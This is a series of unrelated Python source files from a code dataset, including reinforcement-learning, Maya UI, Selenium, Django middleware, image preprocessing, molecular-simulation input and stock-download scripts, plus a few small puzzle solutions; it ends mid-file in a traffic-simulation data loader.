agent.get_action(str(next_state))\n\n # 모든 큐함수 값을 화면에 표시\n env.print_value_all(agent.q_table)\n\n # episode가 끝났으면 while-loop을 종료\n if done:\n if reward > 0:\n num_success += 1\n print(\"success\")\n success_total_step += num_step\n\n else:\n num_fail += 1\n print(\"fail\")\n fail_total_step += num_step\n\n step_log.append(num_step)\n break\n\n with open('pkl/log.pkl', 'wb') as f:\n pickle.dump([step_log,\n num_success,\n num_fail,\n success_total_step,\n fail_total_step], f)","sub_path":"4_sarsa/sarsa_agent_origin.py","file_name":"sarsa_agent_origin.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"551822936","text":"\nfrom .config import *\n\ndef switch_workspace(name):\n src = \"workspaceLayoutManager -sc \\\"%s\\\"\" % name\n eval_mel(src)\n switch_keyMap('kumaKeyMap')\n\ndef workspace_names():\n return eval_mel('workspaceLayoutManager -listLayouts')\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\ndef sync_to_attributeEditor(node_name):\n eval_mel('updateAE \\\"%s\\\"' % node_name)\ndef refresh_attributeEditor():\n eval_mel('refreshAE')\n\ndef window_options(title=None, titleBar=False, cx=None, cy=None, width=None, height=None, background=None):\n return \"-resizeToFitChildren false \" + flag_nullable('title', title) + flag_nullable('iconName', title) + '-titleBar %s ' % lowerBool(titleBar) + flag_nullable('topEdge', cx) + 
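# The Korean TODO comment in the SARSA record above asks for epsilon to
# decrease over time. One common approach is multiplicative decay with a
# floor -- a sketch; the decay constants are illustrative, not from the source:
class DecayingEpsilon:
    def __init__(self, start=0.1, floor=0.01, decay=0.995):
        self.value, self.floor, self.decay = start, floor, decay

    def step(self):
        # Call once per episode: epsilon shrinks geometrically but keeps a
        # floor so some exploration always remains.
        self.value = max(self.floor, self.value * self.decay)
        return self.value

eps = DecayingEpsilon()
print([round(eps.step(), 4) for _ in range(3)])  # [0.0995, 0.099, 0.0985]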
flag_nullable('leftEdge', cy) + flag_nullable('backgroundColor', background and expand_tuple(background)) + flag_nullable(\"width\", width) + flag_nullable('height', height)\n\ndef open(tool):\n abbr = {\n 'ae' : 'Attribute Editor',\n 'se' : 'Script Editor',\n 'xe' : 'XGen Editor',\n 'ue' : 'UV Editor',\n 'ts' : \"Tool Settings\",\n 'pe' : 'Paint Effects',\n 'hs' : 'Hypershade',\n 'tb' : 'Tool Box',\n 'ol' : 'Outliner',\n 'ne' : 'Node Editor',\n 'tm' : 'Time Slider',\n 'le' : 'Layer Editor',\n 'ae2': 'Asset Editor',\n 'he' : 'HotKey Editor',\n }\n action = {\n 'Attribute Editor': 'openAEWindow',\n \"Script Editor\" : \"ScriptEditor\",\n 'UV Editor' : 'TextureViewWindow',\n 'XGen Editor' : 'XgCreateDescriptionEditor',\n \"Tool Settings\" : 'ToolSettingsWindow',\n 'Paint Effects' : 'PaintEffectsWindow',\n 'Hypershade' : 'HypershadeWindow',\n 'Tool Box' : 'ToggleToolbox',\n 'Outliner' : 'OutlinerWindow',\n 'Node Editor' : 'NodeEditorWindow',\n 'Time Slider' : 'ToggleTimeSlider',\n 'Layer Editor' : 'DisplayLayerEditorWindow',\n 'Asset Editor' : 'AssetEditor',\n }\n if tool == 'cb' or tool == 'Channel Box':\n open_channelBox()\n else:\n t = abbr[tool] if tool in abbr else tool\n eval_mel(action[t])\n\ndef open_channelBox():\n eval_mel(\"\"\"\n window %s;\n formLayout form;\n channelBox dave;\n formLayout -e\n -af dave \"top\" 0\n -af dave \"left\" 0\n -af dave \"right\" 0\n -af dave \"bottom\" 0\n form;\n showWindow;\n \"\"\" % window_options(cx=0, cy=0, width=200, height=400))\n\ndef open_contentBrowser():\n eval_mel(\"\"\"\n ContentBrowserWindow;\n string $panelNames[] = `getPanel -scriptType \"contentBrowserPanel\"`;\n string $panelName = $panelNames[0];\n string $panelCompleteName = ($panelName + \"ContentBrowser\");\n contentBrowser -e $panelCompleteName;\n \"\"\")\n\n\n# return the path(s) selected\ndef file_dialog_options():\n return '-dialogStyle 2 -okCaption \\\"Accept\\\" -cancelCaption \\\"Cancel\\\" ' + '-startingDirectory \\\"%s\\\"' % maya_working_directory\ndef ask_for_one_directory(title=\"Ask for one directory\"):\n return eval_mel('fileDialog2 -fileMode 2 -caption \\\"%s\\\"' % title + file_dialog_options())\ndef ask_for_one_file(title=\"Ask for one file\"):\n return eval_mel('fileDialog2 -fileMode 1 -caption \\\"%s\\\"' % title + file_dialog_options())\ndef ask_for_some_files(title=\"As for some files\"):\n return eval_mel('fileDialog2 -fileMode 4 -caption \\\"%s\\\"' % title + file_dialog_options())\n","sub_path":"coldcode/python/master/script/kumaya/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386258286","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import *\nimport traceback\n\n\nclass BasePage(object):\n locators_dictionary = {\n \"ru.investing.com\": \"https://ru.investing.com/\"}\n\n def __init__(self, context, base_url='http://www.seleniumframework.com'):\n self.base_url = base_url\n self.browser = context.browser\n self.timeout = 10\n\n def find_element(self, *loc):\n print(*loc)\n return self.browser.find_element(*loc)\n\n def find_elements(self, *loc):\n return self.browser.find_elements(*loc)\n\n def visit(self, text):\n self.browser.get(self.locators_dictionary[text])\n\n def __getattr__(self, what):\n try:\n if what in self.locator_dictionary.keys():\n try:\n _element = WebDriverWait(self.browser, 
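# The Maya panel record above calls `flag_nullable` and `lowerBool` from a
# wildcard `config` import that is not shown; the reconstruction below is an
# assumption about their behavior, inferred only from how they are called:
def flag_nullable(name, value):
    # Hypothetical: emit nothing for None, else a space-terminated MEL flag.
    return '' if value is None else '-%s %s ' % (name, value)

def lowerBool(value):
    # MEL expects lowercase true/false literals.
    return 'true' if value else 'false'

print(flag_nullable('width', 200) + flag_nullable('height', None))  # "-width 200 "
print(lowerBool(False))  # "false"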
self.timeout).until(\n EC.presence_of_element_located(self.locator_dictionary[what])\n )\n except(TimeoutException, StaleElementReferenceException):\n traceback.print_exc()\n try:\n _element = WebDriverWait(self.browser, self.timeout).until(\n EC.visibility_of_element_located(self.locator_dictionary[what])\n )\n except(TimeoutException, StaleElementReferenceException):\n traceback.print_exc()\n return self.find_element(*self.locator_dictionary[what])\n except AttributeError:\n super(BasePage, self).__getattribute__(\"method_missing\")(what)\n\n def method_missing(self, what):\n print(\"No %s here!\" % what)\n","sub_path":"lib/pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"292574938","text":"import collections\nclass Solution(object):\n def frequencySort(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n ans = \"\"\n st = collections.Counter(s)\n keys = sorted(st, key=st.get, reverse=True)\n for k in keys:\n k = k*st[k]\n ans=ans+k\n return ans\n \n \n","sub_path":"Sort Characters By Frequency.py","file_name":"Sort Characters By Frequency.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"592964162","text":"'''\r\n*CDKB 20180607\r\nPython script as part of ML hotdog/nothotdog test\r\n\r\n*TODO\r\n output 1xn row of features\r\n\tThen loop over directory and do this for all images to output a .txt file of features\r\n'''\r\n\r\n### Modules / Packages ###\r\nimport glob, os\r\nimport sys\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport scipy.io\r\n#sys.path.append('../')\r\n#import pickle\r\n\r\n\r\n### source images stored in image directory\r\n## Import initial image\r\n'''\r\nimg = Image.open(\"IMG_DIR/HOTDOG/1.jpg\")\r\nimg.show()\r\nimg = img.convert(\"L\") ## mode L, black and white mode\r\nprint(\"Box: \",img.getbbox())\r\npix = list(img.getdata())\r\nprint(pix) ## list of all pixel values grayscale\r\nprint(\"Length: \",len(pix))\r\n## need one normalized wxh size\r\nimg = img.resize((400,200))\r\nprint(len(list(img.getdata())))\r\nimg.show()\r\n'''\r\n\r\n\r\n\r\ndef main():\r\n '''\r\n ## converts color images into 1 by ~10000 lists of greyscale pixels\r\n '''\r\n h = 100\r\n w = 150\r\n features = h*w\r\n size = (w,h)\r\n\r\n pos_path = \"IMG_DIR/HOTDOG/\"\r\n neg_path = \"IMG_DIR/NOTHOTDOG/\"\r\n path = [] ## empty list\r\n path.append(pos_path)\r\n path.append(neg_path)\r\n\r\n '''Image counts\r\n Useful for splitting into train/test/cv sets\r\n and for array creation'''\r\n m = 0\r\n for i in path:\r\n for infile in glob.glob(i + \"*.jpg\"):\r\n m += 1\r\n\r\n ## initialize arrays. 
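# The `frequencySort` record above sorts Counter keys by count by hand;
# `Counter.most_common()` expresses the same idea directly. An equivalent
# sketch (not the source's code -- order within equal counts may differ):
import collections

def frequency_sort(s):
    # most_common() yields (char, count) pairs in descending count order.
    return ''.join(ch * n for ch, n in collections.Counter(s).most_common())

print(frequency_sort('tree'))  # 'eetr' (ties keep first-seen order)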
1 big array and 3 subarrays\r\n ary = {}\r\n ary[0] = np.array(np.zeros((1,features+1)))\r\n ary[1] = np.array(np.zeros((1,features+1)))\r\n ary[2] = np.array(np.zeros((1,features+1)))\r\n ary[3] = np.array(np.zeros((1,features+1)))\r\n #print(imgary.dtype)\r\n #print(\"Features: \",features)\r\n #print(\"Elements in Array: \",imgary.size)\r\n #print(\"Shape of Array (r x c): \",imgary.shape)\r\n #imgary[0,10000] = 7 ## assigning elements\r\n ## print(imgary[0,10000]) ## last element, since numpy lists 0-indexed\r\n #np.ones((1,features+1)\r\n\r\n '''Process Images'''\r\n cnt = [0,0]\r\n for i in path:\r\n if i == pos_path: y = 1\r\n if i == neg_path: y = 0\r\n for infile in glob.glob(i + \"*.jpg\"):\r\n file, ext = os.path.splitext(infile)## file is name, ext is the .jpg\r\n img = Image.open(file+ext)\r\n img = img.convert(\"L\")\r\n #img = img.convert(\"I\")\r\n #print(list(img.getdata()))\r\n #w,h = img.size #img = img.rotate(90)\r\n img = img.resize(size) ## convert to standard size\r\n #img.show()\r\n n = list(img.getdata())\r\n n.append(y)\r\n ## generate randomish 60/20/20 spread of examples\r\n ## when assigning each example m to dataset\r\n ## 1=train, 2=cross-valid, 3=test\r\n ary[0] = np.vstack((ary[0],n))\r\n #choice = np.random.choice([3,2,1],1,1,[.2,.2,.6])[0]\r\n #ary[choice] = np.vstack((ary[choice],n))\r\n\r\n #print(ary[choice])\r\n #print(ary[1].flatten())\r\n #print(ary[choice].shape)\r\n if y==1: cnt[1] +=1\r\n if y==0: cnt[0] +=1\r\n print(cnt)\r\n\r\n\r\n print(\"Positive Images: \",cnt[1])\r\n print(\"Negative Images: \",cnt[0])\r\n total = cnt[1] + cnt[0]\r\n print(\"Total images processed: \",total)\r\n\r\n ## delete the first row, was placeholder of 0s to construct array\r\n ary[0] = np.delete(ary[0],0,0)\r\n ary[0] = np.random.permutation(ary[0])\r\n valid_pos = 0\r\n valid_neg = 0\r\n test_pos = 0\r\n test_neg = 0\r\n pos_slice = int(cnt[1]/5)\r\n neg_slice = int(cnt[0]/5)\r\n\r\n ## assign each row to train/valid/test sets\r\n\r\n for i in range(0,total):\r\n n = ary[0][i]\r\n ## this m is y==1\r\n if n[features] == 1:\r\n if valid_pos <= pos_slice:\r\n ary[2] = np.vstack((ary[2],n))\r\n valid_pos = valid_pos+1\r\n elif test_pos <= pos_slice:\r\n ary[3] = np.vstack((ary[3],n))\r\n test_pos = test_pos+1\r\n else: ary[1] = np.vstack((ary[1],n))\r\n ## this m is y==0\r\n elif n[features] == 0:\r\n if valid_neg <= neg_slice:\r\n ary[2] = np.vstack((ary[2],n))\r\n valid_neg = valid_neg+1\r\n elif test_neg <= neg_slice:\r\n ary[3] = np.vstack((ary[3],n))\r\n test_neg = test_neg+1\r\n else: ary[1] = np.vstack((ary[1],n))\r\n\r\n for i in (1,2,3):\r\n ary[i] = np.delete(ary[i],0,0)\r\n ary[i] = np.random.permutation(ary[i])\r\n\r\n print(\"Training dataset: \",ary[1].shape)\r\n print(\"Validation dataset: \",ary[2].shape)\r\n print(\"Testing dataset: \",ary[3].shape)\r\n\r\n scipy.io.savemat('data_train.mat', mdict={'data_train': ary[1]})\r\n scipy.io.savemat('data_valid.mat', mdict={'data_valid': ary[2]})\r\n scipy.io.savemat('data_test.mat', mdict={'data_test': ary[3]})\r\n\r\n\r\nif (__name__==\"__main__\"):\r\n main()\r\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"643892510","text":"n = int(input())\n\nmax_10 = n // 10\n\nans = 0\n\nfor i_10 in range(max_10 + 1):\n after_10 = n - i_10 * 10\n ans += after_10 // 5 + 
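# The image-preprocessing record above grows arrays with np.vstack inside a
# loop, which re-copies the whole array on every append. The usual idiom is to
# collect rows in a list and stack once at the end; a sketch with synthetic rows:
import numpy as np

rows = []
for i in range(4):
    rows.append(np.concatenate([np.full(5, i), [i % 2]]))  # fake pixels + label

data = np.vstack(rows)  # one allocation instead of one per iteration
print(data.shape)       # (4, 6)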
1\n\nprint(ans)\n","sub_path":"1st-term/Python/contests/contest_1/change_of_coins.py","file_name":"change_of_coins.py","file_ext":"py","file_size_in_byte":146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239782853","text":"with open('./input01.txt', 'r') as f:\n a = sorted(map(int, list(f)))\n\nprint('Good')\nfor i in range(len(a) - 2):\n\tif a[i] >= 2020:\n\t\tbreak\n\telse:\n\t\tfor j in range(i + 1, len(a) - 1):\n\t\t\tsum2 = a[i] + a[j]\n\t\t\tif sum2 > 2020:\n\t\t\t\tbreak\n\t\t\telif sum2 == 2020:\n\t\t\t\tprint('2:', a[i] * a[j])\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tfor k in range(j + 1, len(a)):\n\t\t\t\t\tsum3 = sum2 + a[k]\n\t\t\t\t\tif sum3 > 2020:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif sum3 == 2020:\n\t\t\t\t\t\tprint('3:', a[i] * a[j] * a[k])\n\t\t\t\t\t\tbreak\n\nprint('\\nBad, but correct')\nfor i in a:\n\tfor j in a:\n\t\tif (i + j == 2020):\n\t\t\tprint('2:', i * j)\n\t\tfor k in a:\n\t\t\tif (i + j + k == 2020):\n\t\t\t\tprint('3:', i * j * k)\n\nprint('\\nBaaaaaaaad, but correct')\nfrom random import sample\nfrom functools import reduce\n\nfor i in range(2, 4):\n\tsub = []\n\tn = 0\n\twhile n != 2020:\n\t\tsub = sample(a, i)\n\t\tn = sum(sub)\n\tprint(i, reduce((lambda x, y: x * y), sub))\n","sub_path":"day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"418957710","text":"class Solution:\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n size = len(nums)\n # 只要有重复的元素覆盖就可以了\n if size == 0:\n return 0\n # 接下来要赋值的那个元素\n next = 0\n for index in range(1, size):\n if nums[index] != nums[next]:\n next += 1\n nums[next] = nums[index]\n # 当前在最后一个位置上,+ 1 才是新数组的长度\n return next + 1\n","sub_path":"03-数组问题/0026-删除排序数组中的重复项.py","file_name":"0026-删除排序数组中的重复项.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"40493969","text":"__author__ = 'brutu'\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom customuser.models import CustomUser\nfrom course.models import *\nfrom django.utils import timezone\n\nimport re\n\nclass RequireLoginMiddleware(object):\n def __init__(self):\n self.exceptions = tuple([re.compile(url) for url in settings.LOGIN_REQUIRED_URLS_EXCEPTIONS])\n self.require_login_path = getattr(settings, 'LOGIN_URL', '/login/$')\n\n def process_request(self, request):\n if request.user.is_authenticated():\n user = CustomUser.objects.get(pk=request.user.id)\n user.last_activity = timezone.now()\n user.save()\n return None\n\n for url in self.exceptions:\n if url.match(request.path):\n return None\n\n if request.user.is_anonymous():\n return HttpResponseRedirect('%s?next=%s' % (self.require_login_path, request.path))\n\nclass CoursePermissionMiddleware(object):\n def __init__(self):\n self.exceptions = tuple([re.compile(url) for url in settings.COURSE_PERMISSION_URLS_EXCEPTIONS])\n self.home_path = getattr(settings, 'HOME_URL', '/')\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n\n for url in self.exceptions:\n if url.match(request.path): return None\n\n customuser = CustomUser.objects.get(pk=request.user.id)\n course = Course.objects.get(short_title=view_kwargs['course_short_title'])\n\n try:\n courseuserrelation = 
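# The change_of_coins record above counts ways to pay n with coins of 10, 5
# and 1: for each number of tens, `after_10 // 5 + 1` counts the possible
# numbers of fives (the +1 covering "zero fives"), with ones filling the rest.
# A brute-force cross-check of that closed form, assuming those denominations:
def fast(n):
    return sum((n - tens * 10) // 5 + 1 for tens in range(n // 10 + 1))

def brute(n):
    return sum(1 for a in range(n + 1) for b in range(n + 1)
               if 10 * a + 5 * b <= n)

assert all(fast(n) == brute(n) for n in range(80))
print(fast(37))  # 20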
CourseUserRelation.objects.get(user=customuser,course=course)\n courses = []\n for relation in CourseUserRelation.objects.filter(user=customuser):\n courses.append(relation.course)\n request.session['courses'] = courses\n request.session['course_short_title'] = course.short_title\n return None\n except:\n return HttpResponse('You do not have the permission to view anything related to this course!')","sub_path":"custommiddleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"505941728","text":"\"\"\"\ncommon_cv.py\n\nDefine collective variable superclasses (also known as milestone \nshapes) that might be used in SEEKR2 calculations.\n\"\"\"\n\nfrom abserdes import Serializer\n\nclass Spherical_cv_anchor(Serializer):\n \"\"\"\n This object represents an anchor within the concentric spherical\n CV. Used for input purposes only.\n \n Attributes:\n -----------\n radius : float\n The radius of this spherical anchor in units of nanometers.\n \n lower_milestone_radius : float\n Optionally define the locations of the milestones for each\n anchor. This is the radius of the lower milestone.\n \n upper_milestone_radius : float\n Optionally define the locations of the milestones for each\n anchor. This is the radius of the lower milestone.\n \n starting_amber_params : Amber_params or None\n If Amber inputs are used for this anchor, this object contains\n the necessary inputs to start a new simulation.\n \n starting_forcefield_params : Forcefield_params or None\n If Forcefield XML inputs are used for this anchor, this object\n contains the necessary inputs to start a new simulation.\n \n bound_state : bool\n Whether this anchor represents the bound state of a ligand-\n receptor system.\n \n bulk_anchor : bool\n Whether this anchor acts as a bulk state of a ligand-receptor\n system.\n \"\"\"\n \n def __init__(self):\n self.radius = 0.0\n self.lower_milestone_radius = None\n self.upper_milestone_radius = None\n self.starting_amber_params = None\n self.starting_forcefield_params = None\n self.bound_state = False\n self.bulk_anchor = False\n \nclass Spherical_cv_input(Serializer):\n \"\"\"\n Inputs by the user resulting in concentric spherical anchors\n with milestones and the collective variable (CV).\n \n Attributes:\n -----------\n index : int\n The index of this CV input object in the Model_input object.\n \n group1 : list\n A list of ints representing atom indices whose center of mass\n is one end of the CV distance vector.\n \n group2 : list\n A list of ints representing atom indices whose center of mass\n is the other end of the CV distance vector.\n \n input_anchors : list\n A list of Spherical_cv_anchor objects which specify inputs for\n the spherical anchors.\n \"\"\"\n \n def __init__(self):\n self.index = 0\n self.group1 = []\n self.group2 = []\n self.input_anchors = []\n return\n \n def read_plain_input(self, inputs):\n \"\"\"\n Read a plain input file (as opposed to an XML)\n \"\"\"\n \n raise Exception(\"Reading a plain text file is not yet implemented. 
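# Both middleware classes above gate requests by matching request.path against
# pre-compiled exception patterns. The core check isolated from Django; the
# settings values here are made up for illustration:
import re

LOGIN_REQUIRED_URLS_EXCEPTIONS = (r'/login/$', r'/static/.*')  # hypothetical
exceptions = tuple(re.compile(url) for url in LOGIN_REQUIRED_URLS_EXCEPTIONS)

def is_exempt(path):
    # re.match anchors at the start of the string, so patterns behave as
    # prefix rules unless they end with $.
    return any(url.match(path) for url in exceptions)

print(is_exempt('/login/'), is_exempt('/static/app.js'), is_exempt('/courses/1/'))
# True True False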
\"\\\n \"Only an XML CV input may be read at this time.\")\n return\n \n def check(self):\n \"\"\"\n Check user inputs to ensure they have been entered properly.\n \"\"\"\n \n last_radius = -1e9\n found_bulk_anchor = False\n for i, input_anchor in enumerate(self.input_anchors):\n radius = input_anchor.radius\n assert radius >= 0.0, \"A radius must be greater than \"\\\n \"or equal to zero.\"\n assert radius > last_radius, \"Each subsequent radius \"\\\n \"argument must be greater than the last (sorted).\"\n \n if input_anchor.bound_state is None:\n input_anchor.bound_state = False\n \n assert input_anchor.bound_state in [True, False], \\\n \"bound_state must be a boolean\"\n \n if input_anchor.bulk_anchor is None:\n input_anchor.bulk_anchor = False\n \n assert input_anchor.bulk_anchor in [True, False], \\\n \"bulk_anchor must be a boolean\"\n \n if input_anchor.bulk_anchor:\n assert not found_bulk_anchor, \"Only one bulk anchor allowed \"\\\n \"per set of anchors in a CV.\"\n found_bulk_anchor = False\n else:\n assert not found_bulk_anchor, \"Only the outermost anchor \"\\\n \"should be the bulk anchor.\"\n \n if i > 0:\n assert not input_anchor.bound_state, \"Only the lowest\"\\\n \"anchor can be the bound state.\"\n \n assert len(self.input_anchors) > 1, \"A CV must contain \"\\\n \"more than one anchor.\"\n return\n \n","sub_path":"seekr2/modules/common_cv.py","file_name":"common_cv.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"492415487","text":"from nsepy import get_history\nfrom datetime import datetime,timedelta,date\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib\nimport operator\nimport itertools\nfrom nsepy.symbols import get_symbol_list, get_index_constituents_list\nimport matplotlib.pyplot as plt\n\n\n\ndef download_data(token_name, from_date, to_date,interval,indexbool,l):\n i=0\n while i < len(token_name):\n records = get_history(symbol=token_name[i],start=from_date,end=to_date,index=indexbool)\n df = pd.DataFrame(records)\n if i ==0:\n df_final = df\n else:\n df_final = pd.concat([df_final, df],axis = 0) \n i = i+1\n df_final['Date']=df_final.index\n df_final.to_excel(str(l)+'_rawlong.xlsx')\n\n\nnifty50=get_index_constituents_list(\"nifty50\").Symbol.tolist()\n# niftymidcap50=get_index_constituents_list(\"niftymidcap50\").Symbol.tolist()\nniftymidcap100=get_index_constituents_list(\"niftymidcap100\").Symbol.tolist()\n# niftymidcap150=get_index_constituents_list(\"niftymidcap150\").Symbol.tolist()\nniftysmallcap100=get_index_constituents_list(\"niftysmallcap100\").Symbol.tolist()\n# token_name = ['ADANIPOWER','AMARAJABAT','APOLLOHOSP','APOLLOTYRE','ASHOKLEY','BALKRISIND','BANKINDIA','BATAINDIA','BEL','BHARATFORG','BHEL','CESC','CANBK','CASTROLIND','CHOLAFIN','CUMMINSIND','ESCORTS','EXIDEIND','FEDERALBNK','GMRINFRA','GLENMARK','GODREJPROP','IDFCFIRSTB','IBULHSGFIN','JINDALSTEL','JUBLFOOD','L&TFH','LICHSGFIN','MRF','MGL','MANAPPURAM','MFSL','MINDTREE','NATIONALUM','OIL','RBLBANK','RECLTD','SRF','SAIL','SUNTV','TVSMOTOR','TATACONSUM','TATAPOWER','RAMCOCEM','TORNTPOWER','UNIONBANK','IDEA','VOLTAS','NETFMID150']\n# index_name=['NIFTYMID50','NIFTY SMALLCAP 50','NIFTY AUTO','NIFTY BANK','NIFTY IT','NIFTY METAL','NIFTY REALTY','NIFTY PHARMA','NIFTY FMCG','NIFTY GROWSECT 15','NIFTY50 VALUE 20','NIFTY GS 10YR']\n# 
etf_name=['GOLDBEES','LIQUIDBEES','LICNETFGSC','SETF10GILT','NETFLTGILT']\n\n\nindexwise_dict={}\nindexwise_dict['nifty50']=nifty50\n#indexwise_dict['niftymidcap50']=niftymidcap50\nindexwise_dict['niftymidcap100']=niftymidcap100\n#indexwise_dict['niftymidcap150']=niftymidcap150\nindexwise_dict['niftysmallcap100']=niftysmallcap100\n#indexwise_dict['etfs']=etf_name\n\n\nto_date = date.today()- timedelta(days=0)\ninterval = \"day\"\nfrom_date=date(2010,1,1)\n\nfor l in indexwise_dict.keys():\n download_data(indexwise_dict[l], from_date, to_date,interval,False,l)\n \n\n\n","sub_path":"Codes/longtermdownloaddata.py","file_name":"longtermdownloaddata.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"257382821","text":"#!/usr/bin/python \n# -*- coding: utf-8 -*-\nfrom Car import Car\nfrom Cross import Cross\nfrom Road import Road\nfrom PresetCar import PresetCar\n\nclass SettingData(object):\n \"\"\"\n for dualing with all the input data.\n\n Attributes:\n carFile: loading the car data filepath\n crossFile: loading the cross data filepath\n roadFile: loading the road data filepath\n presetFile: loading the presetdata filepath\n\n carDict: a dict that stores all the car's data\n Key: carId\n Values: car's Args()\n\n crossDict: a dict that stores all the cross's data\n Key: crossId\n Values: cross's Args()\n\n roadDict: a dict that stores all the road's data\n Key: roadId\n Values: road's Args()\n\n carQueue: a queue that store all the cars that has not startup\n\n presetQueue: a queue that stores all the preset cars that has not startup\n \"\"\"\n def __init__(self, carFile = None, crossFile = None, roadFile = None, presetFile = None):\n \"\"\"\n A constructor for initiating the original data.\n\n Args:\n carFile: loading the car data filepath\n crossFile: loading the cross data filepath\n roadFile: loading the road data filepath\n \"\"\"\n self.carFile = carFile\n self.crossFile = crossFile\n self.roadFile = roadFile\n self.presetFile = presetFile\n\n self.carDict = dict()\n self.crossDict = dict()\n self.roadDict = dict()\n self.carQueue = list()\n self.vipcarQueue = list()\n self.presetQueue = list()\n\n self.init()\n \n def init(self):\n \"\"\"\n for init all the data that by loading the files\n \"\"\"\n self.getCarMap()\n self.getRoad()\n self.getCross()\n self.getPresetCar()\n self.rankpresetcarQueue()\n #self.rankcarQueue()\n\n def getPresetCar(self):\n \"\"\"\n create all the presetCar queue via input file.\n\n \"\"\"\n try:\n file = open(self.presetFile, mode = 'r', encoding = \"UTF-8\")\n while True:\n line = file.readline()\n if line == \"\":\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n for i in range(len(args)):\n args[i] = int(args[i].strip())\n self.presetQueue.append(PresetCar(args[0], args[1], args[2:]))\n finally:\n file.close()\n\n\n def getCarMap(self):\n \"\"\"\n create all the cars via input file.\n\n also, initiating the carQueue for the game\n \"\"\"\n try:\n file = open(self.carFile, mode=\"r\", encoding=\"utf-8\")\n while True:\n line = file.readline()\n if line == \"\":\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n # create carDict\n if int(args[6].strip())==0:\n self.carDict[int(args[0].strip())] = Car(int(args[0].strip()), int(args[1].strip()), int(args[2].strip()), int(args[3].strip()), int(args[4].strip()), int(args[5].strip()), int(args[6].strip()))\n # create 
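# download_data above calls pd.concat once per symbol, re-copying the growing
# frame each round; collecting frames in a list and concatenating once is the
# usual pandas idiom. A sketch with stand-in frames (no NSE call made here):
import pandas as pd

frames = [pd.DataFrame({'Symbol': [s], 'Close': [100.0]}) for s in ['AAA', 'BBB']]
df_final = pd.concat(frames, axis=0, ignore_index=True)
print(df_final)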
carQueue\n if int(args[5].strip())==1:\n self.vipcarQueue.append(self.carDict[int(args[0])])\n else:\n self.carQueue.append(self.carDict[int(args[0])])\n\n finally:\n file.close()\n\n def getRoad(self):\n \"\"\"\n create all the roads via input file, stored in the roadDict\n \"\"\"\n try:\n file = open(self.roadFile, mode=\"r\", encoding=\"utf-8\")\n lines = file.readlines()\n for line in lines:\n if line == \"\" or line is None:\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n self.roadDict[int(args[0].strip())] = Road(int(args[0].strip()),int(args[1].strip()),int(args[2].strip()),\n int(args[3].strip()),int(args[4].strip()),int(args[5].strip()),int(args[6].strip())) \n finally:\n file.close()\n\n def getCross(self):\n \"\"\"\n create all the crosses via input file, stored in the crossDict\n \"\"\"\n try:\n file = open(self.crossFile, mode=\"r\", encoding=\"utf-8\")\n lines = file.readlines()\n for line in lines:\n if line == \"\" or line is None:\n break\n if line.startswith(\"#\"):\n continue \n args = str.split((line.strip())[1:-1], \",\")\n self.crossDict[int(args[0].strip())] = Cross(int(args[0].strip()),int(args[1].strip()),int(args[2].strip()),\n int(args[3].strip()),int(args[4].strip())) \n finally:\n file.close() \n \n def maxStartTime(self):\n \"\"\"\n get the max start time from all the cars\n\n Returns:\n a int that indicts the max start time in all cars\n \"\"\"\n max_time = -1\n for id in self.carDict.keys():\n max_time = max(self.carDict[id], max_time)\n return max_time\n\n def rankcarQueue(self):\n self.carQueue.sort(key=lambda e: e.startTime, reverse = True)\n self.carQueue.sort(key=lambda e: e.maxSpeed)\n #self.carQueue.sort(key=lambda e: e.priority)\n \n def rankvipcarQueue(self):\n self.carQueue.sort(key=lambda e: e.startTime, reverse = True)\n self.carQueue.sort(key=lambda e: e.maxSpeed)\n #self.carQueue.sort(key=lambda e: e.priority)\n \n def rankpresetcarQueue(self):\n self.presetQueue.sort(key=lambda e: e.startTime, reverse = 